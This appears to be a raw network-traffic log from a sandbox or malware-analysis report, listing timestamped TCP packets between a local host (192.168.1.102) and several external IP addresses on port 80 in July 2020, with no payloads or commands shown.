                                                                                                                                      Jul 14, 2020 11:21:02.484544992 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:02.583926916 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:02.584038019 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:02.584180117 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:02.943934917 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:03.004053116 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:03.041389942 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:03.041649103 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:03.368863106 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:03.468781948 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:03.472527027 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:03.472753048 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:03.796293974 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:03.856543064 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:03.894206047 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:03.894478083 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:04.232069969 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:04.330991983 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:04.331398010 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:04.655843973 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:04.755819082 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:04.758372068 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:04.758706093 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:05.177768946 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:05.237965107 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:05.267096996 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:05.267231941 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:05.559700012 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:05.653503895 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:05.653789043 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:05.965733051 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:06.053298950 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:06.053553104 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:06.352188110 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:06.443144083 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:06.443527937 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:06.757255077 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:06.845221043 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:06.845520973 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:07.170154095 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:07.261219978 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:07.261480093 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:07.583682060 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:07.677033901 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:07.677236080 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:08.011208057 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:08.099565983 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:08.099822998 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:08.460201025 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:08.553215027 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:08.553394079 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:08.942475080 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.033268929 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:09.033406019 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.489628077 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.580629110 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:09.580826044 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.875055075 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:09.963622093 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:09.964097977 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.329473019 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.419209003 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:10.419548988 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.738768101 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:10.827363968 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:10.827696085 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.152817965 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.241822004 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:11.242048979 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.548130989 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.638955116 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:11.639200926 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:11.986920118 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.075288057 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:12.075417995 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.376663923 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.464622974 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:12.464775085 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:12.955755949 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.046689034 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:13.046945095 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.388264894 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.479176998 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:13.479382992 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:13.928440094 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:14.019418001 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:14.019582987 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:14.396789074 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:14.489926100 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:14.490202904 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:15.137546062 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:15.231205940 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:15.231451035 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:15.920120001 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.016776085 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:16.016915083 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.324270964 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.419513941 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:16.419786930 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.756951094 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:16.848412991 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:16.848547935 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.157701969 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.248116970 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:17.248533964 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.539499998 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.629945993 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:17.630156040 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:17.947969913 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.045984030 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:18.046227932 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.495517969 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.591042995 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:18.591264009 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:18.911391020 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.008234978 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.008493900 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.344836950 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.443614960 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.443761110 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.803771973 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.804891109 CEST4971580192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.814433098 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.840445042 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.840583086 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.841192961 CEST80497158.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.841270924 CEST4971580192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.842713118 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:19.910614967 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:19.910706043 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:19.922374964 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.082928896 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.082961082 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.083096027 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:20.084532976 CEST4971480192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:20.121005058 CEST80497148.208.80.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.499816895 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:20.595278978 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:20.595436096 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:20.936074018 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.027698994 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:21.027971029 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.336246967 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.427649975 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:21.427933931 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:21.947421074 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.038686037 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:22.038908958 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.383347988 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.474579096 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:22.474839926 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:22.849162102 CEST4971580192.168.1.1028.208.80.226
                                                                                                                                      Jul 14, 2020 11:21:23.013705015 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.105078936 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:23.106017113 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.421612024 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.515053034 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:23.515281916 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.847744942 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:23.941159010 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:23.941553116 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.291476011 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.382613897 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:24.382931948 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.686016083 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:24.774272919 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:24.774533033 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.090848923 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.178890944 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:25.179223061 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.473553896 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.564625025 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:25.565037966 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.890580893 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:25.979252100 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:25.979474068 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.269500971 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.358181000 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:26.358335972 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.666646004 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:26.754947901 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:26.755101919 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.062346935 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.157646894 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:27.157917976 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.488862038 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.577548027 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:27.577675104 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.893368006 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:27.983858109 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:27.984160900 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:28.332865953 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:28.423402071 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:28.423733950 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:29.189496994 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:29.278027058 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:29.278378010 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:29.720341921 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:29.720519066 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:21:29.990784883 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:30.078178883 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:30.078478098 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:30.420001984 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:30.511107922 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:30.511432886 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:30.873801947 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:30.966468096 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:30.967063904 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:31.279530048 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:31.368153095 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:31.368546963 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:31.696048021 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:31.784147024 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:31.784471035 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:32.233062029 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:32.324143887 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:32.324492931 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:33.262674093 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:33.351138115 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:33.351418972 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:33.781209946 CEST804970554.225.191.113192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:33.781440020 CEST4970580192.168.1.10254.225.191.113
                                                                                                                                      Jul 14, 2020 11:21:34.116233110 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:34.205272913 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:34.205481052 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:34.797559023 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:34.885416031 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:34.885651112 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:35.510005951 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:35.601284981 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:35.601619959 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:35.949476004 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.043642998 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:36.043972015 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.396820068 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.487154007 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:36.487392902 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.786541939 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.879302025 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:36.879333019 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:36.879621983 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.880151033 CEST4970680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:36.940241098 CEST804970691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:37.183384895 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:37.243273020 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:37.243550062 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:37.244510889 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:37.304230928 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:37.458062887 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:37.458444118 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:37.790751934 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:37.850519896 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:37.878901005 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:37.879173040 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:38.188277006 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:38.284400940 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:38.284557104 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:38.630260944 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:38.720710039 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:38.720923901 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:39.026985884 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:39.121481895 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:39.121742010 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:39.430454969 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:39.522489071 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:39.522857904 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:39.831737995 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:39.929546118 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:39.929775000 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:40.242073059 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:40.340636969 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:40.340974092 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:40.675076008 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:40.773619890 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:40.773832083 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:41.088870049 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:41.181619883 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:41.181794882 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:41.521646976 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:41.616925001 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:41.617115974 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:41.933448076 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:42.025422096 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:42.025578022 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:42.333851099 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:42.432853937 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:42.443490028 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:42.443767071 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:42.742784977 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:42.802659035 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:42.830826044 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:42.831279993 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:43.144378901 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:43.232639074 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:43.233032942 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:43.539115906 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:43.629667044 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:43.629856110 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:43.952353954 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:44.042032957 CEST804971691.218.231.226192.168.1.102
                                                                                                                                      Jul 14, 2020 11:21:44.042439938 CEST4971680192.168.1.10291.218.231.226
                                                                                                                                      Jul 14, 2020 11:21:44.414557934 CEST4971680192.168.1.10291.218.231.226
